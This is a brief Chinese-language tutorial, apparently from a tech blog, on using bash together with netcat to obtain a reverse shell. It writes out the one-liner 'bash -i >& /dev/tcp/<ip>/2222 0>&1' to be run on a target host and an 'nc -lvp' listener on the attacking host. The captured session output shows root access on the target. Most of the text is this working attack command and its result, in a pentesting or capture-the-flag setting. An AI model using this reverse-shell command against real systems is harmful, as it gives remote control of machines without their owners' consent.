bash是一个命令解释语言,能够执行读取标准输入或文件的命令,可以执行命令以及结合nc进行反弹shell
基本使用语法:
bash -c 命令
root@kali:~# bash -c whoami
root
root@kali:~#
另外使用-i表示以交互方式运行shell,通常在目标主机上运行:
代码语言:javascript复制bash -i >& /dev/tcp/192.168.5.1/2222 0>&1然后另一台主机使用nc进行监听该端口,即可获取到一个shell!
目标主机:
代码语言:javascript复制root@kali:~# bash -i >& /dev/tcp/192.168.5.1/2222 0>&1攻击主机:
攻击主机:
代码语言:javascript复制F:eth10-CTF-ToolkitsCTF工具包连接工具>nc -lvp 2222
lstn on [any] 2222 ..
192.168.5.128: reverse hst chk phailed: h_errno 11004: NO_DATA
connect to [192.168.5.1] from (UNKNOWN) [192.168.5.128] 53418: NO_DATA
root@kali:~# uname -a
uname -a
Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux
root@kali:~# whoami
whoami
root
root@kali:~#exit
